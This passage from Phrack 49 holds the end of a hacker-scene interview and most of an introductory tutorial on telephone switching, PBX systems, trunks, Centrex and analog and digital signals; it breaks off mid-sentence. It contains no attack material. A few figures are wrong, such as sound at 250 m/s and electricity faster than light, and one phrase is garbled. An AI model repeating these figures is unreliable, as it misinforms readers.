pouring through his code.  The NewHack folks. G-heap, Pope, SpaceRogue, 
Kingpin, Tan, Weld, Stefan, Brian Oblivion, t-com, all the standard
people that hang out and have a good time at the cons with the l0pht folks
(ie the r00t, NHC, l0ck/anti l0ck, cDc...) shit ALL the cDc folks. etc.,
etc. etc.  The ASR guys.  There are so many people that have contributed so 
much. I'm sure I've left out many.   

The biggest one: my father [the only person who could sit there and grin 
through all of it... and explain the leafing  procedures and how the 6502 
REALLY worked] (that's not leafing through on the Apple ][+... two 
separate things).  
  

A few things you would like to say:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

French Toast please...

31337 is not a strong XOR key...
(unless your secret host key is less than 5 characters long)

Thanks to the new phrack lineup for keeping a good thing going.
Still remember DL'ing the latest ones along with the Countlegger series
and having to Dalton's Disk Disintegrator them back together.

Oh yeah... 
and if someone tells you something is secure... 
ask them to prove it, and then STILL don't believe them.


~~~~~~~~~~~~~~~~~~~~~
One last thing, in your personal experience, have you found that most
people in the scene are pretty much computer geeks?

"Absolutely not.  I've had the privilege to hang out with everyone from
Weitse Venema, Dan Farmer, Casper Dik, Peter Guttman, to the hacker scene
like Hobbit, Daemon9, the l0pht folks... and there's very few out of the
bunch that I would label 'computer geeks'.  Computer geeks seem not to have
that creative twist in many cases that hackers have.  This is the same twist
that says: I don't care what it's _supposed_ to do - I bet I can make it do
*this*."

Thanks a lot for the prophile.

"Thanks a lot for the opportunity."



--------------------------------------------------------------------------------


                                .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                  File 05 of 16


                         Introduction to Telephony and PBX
				   by Cavalier[TNO]

                                Table of Contents


       1. . . . . . . . . . . . . . . . . . . . The Central Office
       2. . . . . . . . . . . . . . .Private Branch Exchange (PBX)
       3. . . . . . . . . Properties of Analog and Digital Signals
       4. . . . . . . . . . . . . . . . .Analog-Digital Conversion
       5. . . . . . . . . . . . . . . . . . . Digital Transmission
       6. . . . . . . . . . . . . . . . . . . . . . . Multiplexing
       7. . . . . . . . . . . . . . . . . . . . Transmission Media
       8. . . . . . . . . . . . . . . . . . . . . . . . .Signaling


	.--------------------.
1	| The Central Office |
	`--------------------'

Telephones alone do nothing special.  Their connection to the rest of
world makes them one of mankind's greatest achievements.

In the early days of telephone communications, users had to establish
their own connections to other telephones.  They literally had to string
their own telephone lines.

Although the customer inconvenience of building their own connections
limited the availability of phone service, an even greater problem soon
arose.  As the telephone became more popular, more people wanted to be
connected.   At the time, each phone had to be directly wired to each
other.  In a very short time there was a disorganized maze of wires
running from the homes and businesses.

A simple mathematical formula demonstrates the growth in the number of
connections required in a directly wired network:

                              I = N(N-1)/2
       (I = number of interconnections; N = number of subscribers)

                            I = 100(100-1)/2

If just 100 subscribers attempted to connect to each other, 4950
separate wire connections would be needed!  Obviously, a better method
was needed.


Switching


A Central Office (CO) switch is a device that interconnects user
circuits in a local area, such as a town.  The CO is a building where
all subscriber phone lines are brought together and provided with a
means of interconnection.  If someone wants to call a neighbor, the call
is routed through the CO and switched to the neighbor.

What if someone wanted to call a friend in the next town?  If their
friend was connected to a different CO, there was no way to communicate.

The solution was to interconnect COs.  Then, CO-A routed calls to CO-B
to complete the connection.

Today every CO in the world is connected to every other CO in a vast
communication highway known as the Public Switched Network (PSN).  The
PSN goes by a variety of different names:

                 Dial-up network
                 Switched network
                 Exchange network

The CO provides all users (subscribers) with a connection to each other.
A critical note, however, is that no CO has the resources to switch all
their users simultaneously.  It would be too expensive and it is
unnecessary to attempt to do so because for the vast majority of the
time, only a small percentage of subscribers are on the phone at the
same time.

If, on a rare occasion, all the circuits are busy, the next call will be
blocked. A call is blocked if there are no circuits available to switch
it because all the circuits are in use.

The term `probability of blocking` is a statistical logarithm which
determines the chance that a call cannot be switched.  For modern day
commercial COs, the probability of blocking is very low.


History of COs


Operating switching

In the first COs, a subscriber who wanted to place a call cranked a
magneto-generator to request service from the local phone company.  An
operator at the CO monitored subscriber connections by observing lamps
on a switchboard console.  When a subscriber's lamp lit, indicating the
request for service, the operator would answer: "Number please...".

The operator connected one call to another by plugging one end of a cord
into the jack of the caller  and the other end of the cord into the jack
of the called party, establishing a manual, physical connection.

The switchboard had to have a jack for every incoming and outgoing line
that needed service.  The number of lines an operator could monitor was
limited by her arm's reach.   Billing was accomplished by the operators
writing up a ticket for each call designating its starting and ending
times.

When telephone subscribers were few in number, this method worked fine.
As the popularity of the phone increased, more phones placed more calls
and it became increasingly unmanageable and expensive to manually switch
and bill each call.

Strowger Step-by-Step Switch

A mechanical switch was invented in the 1890's by a Kansas City
mortician named Almon B. Strowger.  He became very suspicious because
callers looking for a mortician were continually referred to his
competition instead to him. When he learned that the local operator was
the wife of his rival, his suspicions were confirmed.  He set about to
invent a switching system that would not be dependent upon human
intervention.

His creation, called the Strowger or Step-by-Step switch, was the first
automated electromechanical switching system.  It placed switching
control in the hands of the subscriber instead of the operator by adding
a dialing mechanism to the phone.

The Strowger switch completed a call by progressing digit by digit
through two axes of a switching matrix in the CO.  A call was stepped
vertically to one of ten levels and rotated horizontally to one of ten
terminals.

It was called step-by-step because calls progress one step at a time as
the customer dialed each digit of the number.  When the final digit was
dialed, the switch seized an available circuit and connected the call.

The result of the step-by step switch was to eliminate the need for
manual operator connection and grant privacy and call control to the
subscriber.

The step-by-step switch was a wonderful invention for its day.   Today
it is obsolete.  Compared to modern day switches, it is slow, noisy
and too expensive to maintain.  It is also both bulky and inefficient.

The Crossbar Switch

The crossbar switch was invented and developed in the late 1920s.  One
of its main technological advanced was the introduction of a hard wired
memory to store dialed digits until the dialing was complete.

Unlike the step-by-step method, calls are not processed under the
direct control of incoming dial pulses.  In the step-by-step method,
each phone call controlled its own pathway through the switching matrix
at the speed the digits were dialed by the user.  The crossbar switch
introduced a better method.

Devices called registers stored the digits in memory as they were dialed
by the callers.  Not until all the digits were dialed would the call
begin to be switched.  Once all the digits were received and stored in
the register, the register handed the digits to a processor to be
examined and used to route the call.

When a pathway had been established and the call was connected, the
register and processor would release and become available to handle
another call. Collectively, this process was called `common control`.

Common control resulted in faster call completion and increased capacity
of the switch.  With the old step-by-step, the time it would take a user
to physically dial the digits would occupy valuable switch time because
dialing the digits was the most time consuming part of switching a call.
This 8 to 12 seconds of dialing time prevented other users from
accessing the switching matrix and generally slowed things down.

The genius of the crossbar common control was to store the dialed digits
as they came in and then after the user finished dialing, send the
digits off for processing.  The act of dialing no longer kept other
calls waiting for switch resources.

Common control created the separation of the control functions (setting
up and directing the call) from the switching functions (physically
creating the connections).

Crossbar Switching Matrix

Calls were connected by sharing a dedicated wire path through the
switching matrix.  Crossbar switches used the intersection of two points
to make a connection.  They selected from a horizontal and vertical
matrix of wires, one row connected to one column.  The system still
stepped the call through the network, but only after all the digits were
dialed.  This method created a more efficient allocation of switch
resources.

There are four important components of a crossbar switch.

   .  The marker is the brain of a crossbar switch.  It identifies a
      line requesting service and allocates a register.

   .  The register provides dial tone and receives and stores the dialed
      digits.

   .  The matrix is a set of horizontal and vertical bars.  The point at
      which the crosspoints meet establishes the connection.

   .  A trunk interface unit, also called a sender, processes calls from
      a PBX.

Although crossbar is faster and less bulky than step-by-step, it is
still electromechanical and requires a lot of maintenance.  It requires
huge amounts of space, generates a lot of heat, and makes a great deal of
noise.

Electronic Switching System  (ESS)

The advent of electronic switching (also called stored program
switching) was made possible by the transistor.  Introduced in 1965, the
Electronic Switching System (ESS) greatly sped up switch processing
capacity and speed and has done nothing less than revolutionize the
industry.

Modern ESS switches perform five main functions to establish and
maintain service in a public network.

   1. Establish a connection between two or more points
   2. Provide maintenance and testing services
   3. Record and sort customer billing charges
   4. Offer customer features, such as call waiting
   5. Allow access to operators for special services

An ESS uses computer-based logic to control the same two primary
operations we introduced with the crossbar -- common control and the
switching matrix.

(In an ESS, the terms stored program control, common control, and
electronic switching are all synonymous.)

ESS Common Control

The function of the common control is similar to its function in the
crossbar. The difference is that common control is accomplished
electronically instead of electromechanically.  Like the crossbar, one
group of control devices controls the functions of all lines.  However,
instead of the hard wired logic of the crossbar, the control device
consists of a computer with memory, storage, and programming capability.

In the ESS, the computer governs the common control.  It monitors all
the lines and trunks coming into the CO, searching for changes in the
electrical state of the circuit, such as a phone going off-hook.  When a
subscriber goes off- hook and dials a number, the common control
equipment detects the request for service and responds by returning the
dial tone.  It then receives, stores, and interprets the dialed digits.

Again, similar to the workings of the crossbar, once the digits have
been processed, the computer establishes a path through the switching
matrix to complete the call.  After the connection for the call has been
established, the common control equipment releases and becomes available
to complete other calls.

ESS Switching Matrix

Recall that in the crossbar, calls were connected by sharing a dedicated
wire path through the matrix, establishing a connection between an input
and an output.  The matrix in an ESS is logically similar to the
crossbar grid except the pathway is electronic instead of
electromechanical.  Called a TDM bus, it is solid state circuitry and is
printed into small computer controlled circuit boards.  The computer
controls the connections and path status map to determine which path
should be established to connect the calling and called parties.

Remember

      Crossbar switching matrix  =  maze of physical wire cross connections

      ESS switching matrix  =  electronic multiplexed TDM (time division
      multiplexing) bus

ESS Advancements

The unprecedented advancement of the ESS was the speed and processing
power advantage it had over the crossbar because it switched calls
digitally instead of electromechanically.  The processing capacity that
would have required a city block of crossbar technology could be
accomplished by one floor of ESS equipment.  Much less effort was
required to maintain the ESS because it was smaller and had fewer moving
parts.

Telephone companies would have moved to the new technology for these
advantages alone.  But, there was much more to be offered.  There was
the power of the computer.

There are major advantages to a computer stored program.  It allows the
system to perform functions earlier switches were incapable of.  For
example, the switch can collect statistical information to determine its
effectiveness.  It can perform self-diagnostics of circuit and system
irregularities and report malfunctions.  If trouble occurs, technicians
can address it via a keyboard and terminal.  The same terminal, often
called a system managers terminal, allows personnel to perform system
changes and to load new software, eliminating the need for manually
rewiring connections.

The computer uses two types of memory:

   .  Read Only Memory (ROM) is used to store basic operating
      instructions and cannot be altered by the end user.  The contents
      of this memory can only be changed by the manufacturer.

   .  Random Access Memory (RAM) stores configuration and database
      information.  The contents of its memory can be changed by a
      system administrator.

Other important functions of the computer include

   .  Performing telephone billing functions
   .  Generating traffic analysis reports
   .  Generating all tones and announcements regarding the status of
      circuits and calls

Computer control operates under the direction of software called its
generic program.  Periodically updating or adding to the generic program
allows the ESS to be much more flexible and manageable than previous
switch generations because it is the software, not the hardware, that
normally has to be upgraded.

Electronic switching heralded the introduction of new customer features
and services.  Credit card calls, last number redial, station transfer,
conference calling, and automatic number identification (ANI) are just 
a few examples of unprecedented customer offerings.

The ESS is an almost fail-safe machine.  Its design objective is one
hour's outage in 20 years.  In today's competitive environment for
higher quality communication equipment, ESS machines provide a level of
service and reliability unachievable in the past.



	.-----------------------------------.
2	| The Private Branch Exchange (PBX) |
	`-----------------------------------'

The two primary goals of every PBX are to

         . facilitate communication in a business
         . be cost effective


Organizations that have more than a few phones usually have an internal
switching mechanism that connects the internal phones to each other and
to the outside world.

A PBX is like a miniature Central Office switching system designed for a
private institution.  A PBX performs many of the same functions as a CO
does. In fact, some larger institutions use genuine COs as their private
PBX.

Although a PBX and a CO are closely related, there are differences
between them

   .  A PBX is intended for private operation within a company.  A CO is
      intended for public service.

   .  A PBX usually has a console station that greets outside callers
      and connects them to internal extensions.

   .  Most PBXs do not maintain the high level of service protection
      that must be maintained in a CO.  Assurance features such as
      processor redundancy (in the event of processor failure) and
      battery backup power, which are standard in a CO, may not be a
      part of a PBX.

   .  COs require a seven digit local telephone number, while PBXs can
      be more flexible and create dialing plans to best serve their
      users (3, 4 5, or 6 digit extensions).

   .  A PBX can restrict individual stations or groups of stations from
      certain features and services, such as access to outside lines.  A
      CO usually has no interest in restricting because these features
      and services are billed to the customer.  COs normally provide
      unlimited access to every member on the network.

A PBX is composed of three major elements.

      1.  Common equipment (a processor and a switching matrix)
      2.  CO trunks
      3.  Station lines


Common Equipment

The operation of a PBX parallels the operation of a Central Office ESS.
Its common control is

   .  A computer operated Central Processing Unit (CPU) running software
      that intelligently determines what must be done and how best to do
      it.

   .  A digital multiplexed switching matrix printed on circuit boards
      that establishes an interconnection between the calling and called
      parties.

The CPU stores operating instructions and a database of information from
which it can make decisions.  It constantly monitors all lines for
supervisory and control signals.  A switching matrix sets up the
connections between stations or between stations and outgoing trunks.

Housed in equipment cabinets, PBX common equipment is often compact
enough to occupy just a closet or small room.  Given the extremely high
rental rates many companies have, a major benefit of a PBX is its small
size.

CO Trunks and Station Lines

A trunk is a communication pathway between switches.  A trunk may
provide a pathway between a PBX and the CO or between two PBXs and two
COs.  A trunk may be privately owned or be a leased set of lines that
run through the Public Switched Network.

A line is a communication pathway between a switch and terminal
equipment, such as between a PBX and an internal telephone or between a
CO and a home telephone.

The function of the PBX is to interconnect or switch outgoing trunks
with internal lines.


Two Varieties of Lines

Station lines are either analog or digital, depending on the station
equipment it is connecting.  If the phone on one desk is digital, it
should be connected to a digital line.  If the phone on the desk is
analog, it should be connected to an analog line.


Varieties of Trunks

There exists a wide variety of trunks that can be connected to a PBX for
off-premises communication.  Each variety has different functions and
capabilities.  It is important to be able to distinguish them.

Tie Trunks

Organizations supporting a network of geographically dispersed PBXs
often use tie trunks to interconnect them.  A tie trunk is a permanent
circuit between two PBXs in a private network.  Tie trunks are usually
leased from the common carrier; however, a private microwave arrangement
can be established. Usually, leased tie trunks are not charged on a per 
call basis but rather on the length of the trunk.  If a tie trunk is
used more than one or two hours a day, distance sensitive pricing is
more economical.

A T1 trunk is a digital CO leased trunk that is capable of being
multiplexed into 24 voice or data channels at a total rate of 1.544
Mbps.  T1 trunks are used as PBX-to-PBX tie trunks, PBX-to-CO trunks as
well as PBX trunks to bypass the local CO and connect directly to a long
distance carrier.  It is a standard for digital transmission in North
America and Japan.

T1 uses two pairs of normal, twisted wire--the same as would be found in
a subscriber's residence.  Pulse Code Modulation is the preferred method
of analog to digital conversion.

A T2 trunk is capable of 96 multiplexed channels at a total rate of
6.312 Mbps.

A T3 trunk is capable of 672 multiplexed channels at a total rate of
44.736 Mbps.

A T4 trunk is capable of 4,032 multiplexed channels at a total of
274.176 Mbps.


Direct Inward Dialing (DID) Trunks

Incoming calls to a PBX often first flow through an attendant position.
DID trunks allow users to receive calls directly from the outside
without intervention from the attendant.  DID offers three main
advantages.

      1. It allows direct access to stations from outside the PBX.
      2. It allows users to receive calls even when the attendant
      switchboard is closed.
      3. It takes a portion of the load off the attendants.

Trunk Pools

Trunks do not terminate at a user's telephone station.  Instead trunks
are bundled into groups of similarly configured trunks called trunk
pools.  When a user wants to access a trunk, he can dial a trunk access
code--for example, he can dial 9 to obtain a trunk in the pool.  Trunk
pools make system administration less complicated because it is easier
to administer a small number of groups than a large number of individual
trunks.


Ports

Ports are the physical and electrical interface between the PBX and a
trunk or station line.


PBX Telephones

Telephone stations in a PBX are not directly connected to the CO but to
the PBX instead.  When a station goes off-hook, the PBX recognizes it
and sends to the station its own dial tone.  The PBX requires some
access digit, usually "9" to obtain an idle CO trunk from a pool to
connect the station with the public network.   This connection between
the telephone and the PBX allows stations to take advantage of a myriad
of PBX features.

The attendant console is a special PBX telephone designed to serve
several functions.  Traditionally, most PBXs have used attendants as the
central answering point for incoming calls.  Calls placed to the PBX
first connected to the attendant, who answered the company name.  The
attendant  then established a connection to the desired party.  The
attendant also provided assistance to PBX users, including directory
assistance and reports of problems.

In recent years a number of cost-saving improvements have been made to
the attendant console.  A feature commonly called automated attendant
can establish connections without a human interface, substantially
decreasing PBX operating costs.

Blocking versus Non-blocking

Blocking is a critical aspect of the functioning of a PBX.  A
non-blocking switch is one that provides as many input/output interface
ports as there are lines in the network.   In other words, the switching
matrix provides enough paths for all line and trunk ports to be
connected simultaneously.

PBX systems are usually blocking.  It requires an exponential increase
in resources and expense to ensure non-blocking.   Based on call traffic
studies and the nature of calls, it is generally acceptable to engineer
a low level of blocking in exchange for a major savings of common
equipment resources.

Grades of service are quantitative measurements of blocking.  They are
written in the form:

                 P.xx

where xx is a two digit number that indicates how many calls out of a
hundred will be blocked.  The smaller the number, the better the grade
of service.

P.01 means one call out of a hundred will be blocked.  It is a better
grade of service than P.05 that block five calls out of a hundred.
Naturally the P.05 service costs less than the better grade of service
provided by P.01.

Even if a PBX's switching matrix is non-blocking, an internal caller may
still not be able to reach an outside trunk if all the trunks are busy.
CO trunks cost money, and very few PBXs dedicate one trunk to every
internal line. Instead, traffic studies are performed to determine the
percentage of time a station will be connected to an outside trunk
during peak hours.

If, for example, it is determined that the average station uses a trunk
only 20% of the time during peak hours, then the switch may be
configured to have a 5:1 line-to-trunk ratio, meaning for every five
lines (or extensions) there is one trunk.  Most PBXs are configured on
this principle as a major cost saving method.


PBX Features

COs and PBXs share many of the same attributes and functionality.
However, COs are built to perform different tasks than a PBX, resulting
in feature differences between them.  The following is an overview of
common PBX features not found in a CO.

Automatic Route Selection (ARS)

A primary concern of any telecommunications manager is to keep costs
down. One of these costs is long distance service.  ARS is a feature
that controls long distance costs.

Most PBXs have more than just public CO trunks connected to them.  They
may have a combination of tie trunks to other PBXs (T1/E1 trunks and
many others). Each type of trunk has a separate billing scheme,
relatively more or less expensive for a given number of variables.

It is extremely difficult to attempt to educate company employees on
which trunks to select for which calls at what time of day.  It defeats
the productivity-raising, user-transparency goal of any PBX if employees
must pour over tariffing charts every time they want to use the phone.

Instead, ARS programs the PBX central processor to select the least
expensive trunk on a call by call basis.  When a user places a call, the
computer determines the most cost effective route, dials the digits and
completes the call.


Feature Access

PBXs support a wide variety of user features.  For example, call
forward, hold, and call pickup are all user features.  There are two
methods of activating a feature.  A code, such as "*62" can be assigned
to the call forward feature. To activate call forward the user presses
"*62" and continues dialing.

Dial codes are not the preferred method of feature access.   The problem
is that users tend to forget the codes and either waste time looking
them up or do not take advantage of time saving features, thereby
defeating the purpose of buying them.

Dedicated button feature access is a better solution.   Programmable
feature buttons, located on most PBX telephones, are pressed to activate
the desired feature.  If a user wants to activate call forward, he
presses a button labeled "call forward" and continues dialing.

The only drawback of telephones with programmable feature buttons is
that they are more expensive than standard phones.


Voice Mail

For a voice conversation to occur, there is one prerequisite so obvious
it is usually overlooked.  The called party must be available to answer
the call.  In today's busy world, people are often not accessible which
can create a major problem resulting in messages not being received and
business not being conducted.

Statistics confirm the need for an alternate method.

      75% of call attempts fail to make contact with the desired party.

      50% of business calls involve one-way information--one party
      wishing to deliver information to another party without any
      response necessary.

      50% of incoming calls are less important than the activity they
      interrupt.

Voice mail (also known as store and forward technology) is a valuable
feature that is designed around today's busy, mobile office.  It is like
a centralized answering machine for all telephone stations in a PBX.
When a telephone is busy or unattended, the systems routes the caller to
a voice announcement that explains that the called party is unavailable
and invites the caller to leave a message.  The message is stored until
the station user enters a security dial access code and retrieves the
message.


Automated Attendant

Automated attendant is a feature sometimes included with voice mail.  It
allows outside callers to bypass a human attendant by routing their own
calls through the PBX.  Callers are greeted with a recorded announcement
that prompts them to dial the extension number of the desired position,
or stay on the line to be connected to an attendant.

Reducing cost is the primary goal of automated attendant.  The decreased
attendant work load more d) an pays for the cost of the software and
equipment.

When automated attendant was first introduced, it met with substantial
resistance from the general public.  People did not want to talk to a
machine. But, as its cost effectiveness drove many companies to employ
it, the public has slowly adjusted to the new technology.

Restriction

Nearly every PBX enforces some combination of inside and outside calling
restrictions on certain phones.  Depending upon the sophistication of
the PBX, a system administrator can have nearly unlimited flexibility in
assigning restrictions.   For example, a tire manufacturing plant could
restrict all lobby phones at corporate headquarters to internal and
local calls only.  The phones at the storage warehouse could be
restricted for only internal calling.  But, all executive phones could
be left unrestricted.

Long distance toll charges can be a crippling expense.  Toll fraud is a
major corporate problem.  Restriction combats unauthorized use of
company telephone resources and is a prime function of any PBX.


Tandems

As stated earlier, it is necessary to have a switching mechanism to
interconnect calls.  If a number of phones all wish to be able to talk
to each other, an enormous amount of cabling would be wasted tying each
of them together.  Thus, the switch was born.

The same principle applies for interconnecting PBXs.  Large firms that
have PBXs scattered all over the country want each PBX to have the
ability to access every other one.  But the expense of directly
connecting each could drive a company out of business.  The solution is
to create a centrally located tandem switching station to interconnect
the phones from one PBX with the phones from any other.  This solution
creates a Private Switched Network.

Directing digits are often used to inform the tandem switch where to
route the call.  Each PBX is assigned a unique number.  Let's say a PBX
in Paris is numbered "4."  To call the Paris PBX from a PBX in Chicago,
a user would dial "4- XXXX."


Uniform Dialing Plan

A network of PBXs can be configured poorly so that calling an extension
at another PBX could involve dialing a long, confusing series of numbers
and create a lot of user frustration.  A Uniform Dialing Plan enables a
caller to dial another internal extension at any PBX on the network with
a minimum of digits, perhaps four or five.  The system determines where
to route the call, translates the digits and chooses the best facility,
all without the knowledge of the user.  As far as the user knows, the
call could have been placed to a station at the next desk.


Call Accounting System (CAS) and Station Message Detail Recording (SMDR)

CAS works in conjunction with SMDR to identify and monitor telephone
usage in the system.  SMDR records call information such as the calling
number, the time of the call, and its duration.  The raw data is usually
listed chronologically and can be printed on reports.

SMDR by itself is not particularly useful because the sheer volume and
lack of sorting capability of the reports make them difficult to work
with.  A Call Accounting Systems is a database program that addresses
these shortcomings by producing clear, concise management reports
detailing phone usage.

The primary function of CAS reports is to help control and discourage
unnecessary or unauthorized use and to bill back calling charges to
users. Many law firms use a call accounting system to bill individual
clients for every call they make on behalf of each client.


Attendant Features

A number of features are available to improve the efficiency of
attendant consoles.

Here are a few of them.

      Direct Station Selection (DSS) allows attendants to call any
      station telephone by pressing a button labeled with its extension.

      Automatic Timed Reminder alerts the attendant that a station has
      not picked up its call.  The attendant may choose to reconnect to
      the call and attempt to reroute it.

      Centralized Attendant Service groups all network attendants into
      the same physical location to avoid redundancies of service and
      locations.


Power Failure Schemes

If a city or a town experiences a commercial power failure, telephones
connected directly to the CO will not be affected because the CO gets
power from its own internal battery source.  A PBX, however, is
susceptible to general power failures because it usually gets its power
from the municipal electric company.

There are several different ways a PBX can be configured to overcome a
power failure.

      A PBX can be directly connected to a DC battery which serves as
      its source of power.  The battery is continually recharged by an
      AC line to the electric company.  In the event of a power failure,
      the PBX will continue functioning until the battery runs out.

      A PBX can have an Uninterruptable Power Supply (UPS) to protect
      against temporary surges or losses of power.

      A PBX can use a Power Failure Transfer (PFT) which, in the event
      of a power failure, immediately connects preassigned analog phones
      to CO trunks, thereby using power from the CO instead of from the
      PBX.


Outgoing Trunk Queuing

In the event all outgoing trunks are busy, this feature allows a user to
dial a Trunk Queuing code and hang up.  As soon as a trunk becomes free,
the system reserves it for the user, rings the station and connects the
outside call automatically.


System Management

PBXs can be so large and complex that without a carefully designed
method of system management chaos can result.  The best, most advanced
systems mimic CO management features--computer access terminals which
clearly and logically program and control most system features.  The
system manager has a wide variety of responsibilities which may include,
but is not limited to

      Programming telephone moves, additions, and changes on the system

      Performing traffic analysis to maximize system configuration
      resources and optimize network performance

      Responding to system-generated alarms

      Programming telephone, system, attendant, and network features.


ISDN


ISDN is not a product.  Rather, it is a series of standards created by
the international body, ITU (previously known as CCITT), to support the
implementation of digital transmission of voice, data, and image through
standard interfaces.  Its goal is to combine all communications services
offered over separate networks into a single, standard network.  Any
subscriber could gain access to this vast network by simply plugging
into the wall.  (At this time not all PBXs are compatible with the ISDN
standard.)


Alternatives to a PBX

There are two main alternatives to purchasing a PBX.  They are
purchasing a Key system or renting Centrex service from the local
telephone company.


Key System

Key systems are designed for very small customers, who typically use
under 15 lines.  There is no switching mechanism as in a PBX.  Instead
every line terminates on every phone. Hence, everyone with a phone can
pick up every incoming call.

Key systems are characterized by a fat cable at the back of each phone.
The cables are fat because each phone is directly connected to each
incoming line and each line has to be wired separately to each phone.

Fat cables have become a drawback to Key systems as building wire
conduits have begun to fill with wire.  It has become increasingly
difficult to add and move stations because technicians must physically
rewire the bulky cables instead of simply programming a change in the
software.

Key telephones are equipped with line assignment buttons that light on
incoming calls and flash on held calls.  These buttons enable a user to
access each line associated with each button.  Unlike a PBX, there is no
need to interface with an attendant console to obtain an outside line.


Differences between Key and PBX Systems

      Key systems have no switching matrix.  In a Key system, incoming
      calls terminate directly on a station user's phone.  In a PBX,
      incoming calls usually first go to the attendant who switches the
      call to the appropriate station.

      PBX accesses CO trunk pools by dialing an access code such as "9."
      Key systems CO trunks are not pooled.  They are accessed directly.

Key systems make use of a limited number of features, many of them
common to the PBX.  These include

           Last number redial
           Speed dialing
           Message waiting lamp
           Paging
           Toll restriction

Today's PBXs can simulate Key system operation.  For example, telephones
can have a line directly terminating on a button for direct access.


Centrex

The other alternative to purchasing a PBX is leasing a Centrex service.

Centrex is a group of PBX-like service offerings furnished by the local
telephone company.  It offers many of the same features and functions
associated with a PBX, but without the expense of owning and maintaining
equipment and supporting in-house administrative personnel.

Because network control remains the responsibility  of the CO, companies
that choose Centrex service over purchasing and maintaining a private
PBX can ignore the sophisticated world of high tech telecommunications
and leave it up to the telephone company representatives.

To provide Centrex service, a pair of wires is extended from the CO to
each user's phone.  Centrex provides an "extension" at each station
complete with its own telephone number.  No switching equipment is
located at the customer premises.  Instead, Centrex equipment is
physically located at the CO.

There are a number of reasons a company would choose a Centrex system
over owning their own PBX.  Currently Centrex has six million customers
in the United States market.

Advantages of a Centrex System over a PBX:

      Nearly uninterruptable service due to large redundancies in the CO

      Easily upgraded to advanced features.

      No floor space requirement for equipment.

      No capital investment

      24-hour maintenance coverage by CO technicians

      Inherent Direct Inward Dialing (DID).  All lines terminate at
      extensions, instead of first flowing through a switchboard.

      Call accounting and user billing as inherent part of the service.

      Reduced administrative payroll.


Disadvantages of a Centrex System:

      Cost.  Centrex is tariffed by the local telephone company and can
      be very expensive.  Companies are charged for each line connected
      to the Centrex, as well for the particular service plan chosen.
      Additionally, Centrex service may be subject to monthly increases.

      Feature availability.  Centrex feature options are generally not
      state of the art, lagging behind PBX technology.  Not all COs are
      of the same generation and level of sophistication--a company
      associated with an older CO may be subject to inferior service and
      limited or outdated feature options.

      Control of the network is the responsibility of the CO.  While
      this release from responsibility is often cited as a positive
      feature of Centrex, there are drawback to relinquishing control.
      CO bureaucracy can be such that a station move, addition or change
      can sometimes take days to achieve.   Furthermore, each request is
      charged a fee.  Also, some companies are more particular about
      certain features of their network (security for example) and
      require direct control for themselves.



	.------------------------------------------.
3	| Properties of Analog and Digital Signals |
	`------------------------------------------'

A man in Canada picks up a telephone and dials a number.  Within
seconds, he begins talking to his business partner in Madrid.  How can
this be?

Telephony is a constantly evolving technology with scientific rules and
standards.  You will learn to make sense of what would otherwise seem
impossible.

Voice travels at 250 meters per second and has a range limited to the
strength of the speaker's lungs.  In contrast, electricity travels at
speeds approaching the speed of light (310,000 Km per second) and can be
recharged to travel lengths spanning the globe.  Obviously, electricity
is a more effective method of transmission.

To capitalize on the transmission properties of electricity, voice is
first converted into electrical impulses and then transmitted.  These
electrical impulses represent the varying characteristics that
distinguish all of our voices.  The impulses are transmitted at high
speeds and then decoded at the receiving end into a recognizable
duplication of the original voice.

For a hundred years, scientists have been challenged by how best to
represent voice by electrical impulses.  An enormous amount of effort
has been devoted to solving this puzzle.  The two forms of electrical
signals used to represent voice are analog and digital.

Both analog and digital signals are composed of waveforms.  However,
their waveforms have very distinctive properties which distinguish them.
To understand the science of telephony, it is necessary to understand
how analog and digital signals function, and what the differences
between them are.

If you do not possess a fundamental understanding of basic waveforms,
you will not understand many of the more advanced concepts of
telecommunications.


Analog Signal Properties

Air is the medium that carries sound.  When we speak to one another, our
vocal chords create a disturbance of the air.  This disturbance causes
air molecules to become expanded and compress thus creating waves.  This
type of wave is called analog, because it creates a waveform similar to
the sound it represents.

Analog waves are found in nature.  They are continually flowing and have
a limitless number of values.  The sine wave is a good example of an
analog signal.


Three properties of analog signals are particularly important in
transmission:

                   amplitude      frequency      phase

Amplitude

Amplitude refers to the maximum height of an analog signal.  Amplitude
is measured in decibels when the signal is measured in the form of
audible sound. Amplitude is measured in volts when the signal is in the
form of electrical energy.


                       Amplitude of an Analog Wave


Volts represent the instantaneous amount of power an analog signal
contains.

Amplitude, wave height, and loudness of an analog signal represent the
same property of the signal.  Decibels and volts are simply two
different units of measurement which are used to quantify this property.

Frequency

Frequency is the number of sound waves or cycles that occur in a given
length of time.  A cycle is represented by a 360 degree sine wave.
Frequency is measured in cycles per second, commonly called hertz (Hz).

Frequency corresponds to the pitch (highness or lowness) of a sound. The
higher the frequency, the higher the pitch.  The high pitch tone of a
flute will have a higher frequency than the low pitch tone of a bass.

Phase refers to the relative position of a wave at a point in time.  It
is useful to compare the phase of two waves that have the same frequency
by determining whether the waves have the same shape or position at the
same time.  Waves that are in-step are said to be in phase, and waves
that are not synchronized are called out-of-phase.

Modulation


The reason these three properties are significant is that each can be
changed (modulated) to facilitate transmission.

The term modulation means imposing information on an electrical signal.

The process of modulation begins with a wave of constant amplitude,
frequency, and phase called carrier wave.  Information signals
representing voice, data, or video modulate a property (amplitude,
frequency, or phase) of the carrier wave to create a representation of
itself on the wave.

Amplitude Modulation is a method of adding information to an analog
signal by varying its amplitude while keeping its frequency constant. AM
radio is achieved by amplitude modulation.

Frequency Modulation adds information to an analog signal by varying its
frequency while keeping its amplitude constant.  FM radio is achieved by
frequency modulation.

Phase Modulation adds information to an analog signal by varying its
phase.

The modulated wave carrying the information is then transmitted to a
distant station where it is decoded and the information is extracted
from the signal. 


Properties of Digital Signals


Unlike analog signals, digital signals do not occur in nature.  Digital
signals are an invention of mankind.  They were created as a method of
coding information.  An early example of digital signals is the Morse
Code.

Digital signals have discrete, non-continuous values.  Digital signals
have only two states:


       Type of Signal                  State
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       Light switch           On                    Off


       Voltage                Voltage Level 1       Voltage Level 2
                              (-2 volts)            (+2 volts)

       Morse                  Short beat            Long beat



Computers and humans cannot communicate directly with each other.  We do
not understand what tiny bits and voltage changes mean.  Computers do
not understand the letters of the alphabet or words.

For computers and humans to communicate with each other, a variety of
